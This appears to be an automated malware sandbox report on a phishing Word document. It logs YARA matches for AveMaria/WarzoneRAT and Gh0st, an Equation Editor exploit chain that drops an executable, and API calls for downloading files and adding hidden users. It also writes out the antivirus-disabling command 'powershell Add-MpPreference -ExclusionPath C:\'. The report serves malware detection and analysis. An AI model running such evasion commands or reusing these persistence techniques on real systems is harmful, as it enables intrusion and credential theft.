            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000005.00000002.1180455880.0000000000AEF000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000005.00000003.980168722.00000000004CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000005.00000003.980064261.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: String function: 009B0969 appears 48 times
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: String function: 009A35E5 appears 40 times
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_003FB2EE NtQuerySystemInformation,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_003FB2CC NtQuerySystemInformation,
            Source: New Order ( MY 01-22-DTHI .LNK.0.drLNK file: ..\..\..\..\..\Desktop\New Order ( MY 01-22-DTHI .doc
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$w Order ( MY 01-22-DTHI .docJump to behavior
            Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winDOC@9/11@0/2
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009AD49C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD7C10 LoadResource,LockResource,SizeofResource,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
            Source: ~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmp.0.drOLE document summary: title field not present or empty
            Source: ~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmp.0.drOLE document summary: author field not present or empty
            Source: ~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmp.0.drOLE document summary: edited time not present or 0
            Source: New Order ( MY 01-22-DTHI .docVirustotal: Detection: 42%
            Source: New Order ( MY 01-22-DTHI .docMetadefender: Detection: 42%
            Source: New Order ( MY 01-22-DTHI .docReversingLabs: Detection: 47%
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P..............................c......................0.......#.......................................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P..............................c......................0.......#.........z.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P..............................c......................0......./.......................................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P..............................d......................0......./.........z.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............................6d......................0.......;...............|.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............................Rd......................0.......;.........z.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......zd......................0.......G.........z.....".......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P..............................d......................0.......G.........z.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P..............................d......................0.......S...............V.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P..............................d......................0.......S.........z.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P..............................e......................0......._.......................................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P..............................e......................0......._.........z.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......k.........z.....2.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................^e......................0.......k.........z.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P..............................e......................0.......w...............l.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P..............................e......................0.......w.........z.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................e......................0.................z.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................e......................0.................z.............................
            Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .[.V.e.r.s.i.o.n. .6...1...7.6.0.1.]...........".....H.......................
            Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ....................................c.r.(.P.....8....... ....... ........a......................6.0.1.]...........".............(...............
            Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ....................................c.r.(.P.....8....... ................a......................6.0.1.].................~.......(...............
            Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ....................................c.r.(.P.....8....... ................a......................6.0.1.]...........".............................
            Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ..................I.....................(.P.....8....... ................a......................6.0.1.]...........".............................
            Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ..................I.............C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>."a......................6.0.1.]...........".....(.......(...............
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe C:\Users\user\AppData\Roaming\fiftikmernk852317.exe
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe "C:\Users\user\AppData\Roaming\fiftikmernk852317.exe"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe C:\Users\user\AppData\Roaming\fiftikmernk852317.exe
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{62BE5D10-60EB-11D0-BD3B-00A0C911CE86}\InprocServer32
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009AF619 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_003FACEE AdjustTokenPrivileges,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_003FACB7 AdjustTokenPrivileges,
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR585C.tmpJump to behavior
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD1DD0 CoCreateInstance,StringFromGUID2,__alloca_probe_16,strcpy_s,strcat_s,strcat_s,strcat_s,RegQueryInfoKeyA,RegQueryInfoKeyA,strcpy_s,strcat_s,strcat_s,strcat_s,RegQueryInfoKeyA,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009B20B8 RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdbAA source: powershell.exe, 00000006.00000002.993133071.00000000057CD000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: G??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.1468.35906984on.pdby.resources.exes.exeI.ni.dlle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\.Ne source: powershell.exe, 00000006.00000002.988242865.0000000000534000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbK source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdb^ source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
            Source: ~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmp.0.drInitial sample: OLE indicators vbamacros = False
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0068C140 pushad ; retf 0069h
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0068B39F pushad ; retf
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD8F76 push ecx; ret
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009A1190 push eax; ret
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009A1190 push eax; ret
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_02420ACF push eax; ret
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_02420ACF push eax; ret
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_02433DF0 push ebp; retf
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009AFA42 LoadLibraryA,GetProcAddress,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009AD418 NetUserAdd,NetLocalGroupAddMembers,
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fifthikmerozx[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009A27D3 URLDownloadToFileW,ShellExecuteW,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009AAC0A lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009AA6C8 GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009AD508 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

            Hooking and other Techniques for Hiding and Protection

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeFile opened: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe:Zone.Identifier read attributes | delete
            Contains functionality to hide user accounts
            Source: fiftikmernk852317.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: fiftikmernk852317.exe, 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: fiftikmernk852317.exe, 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: fiftikmernk852317.exe, 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: fiftikmernk852317.exe, 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: fiftikmernk852317.exe, 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
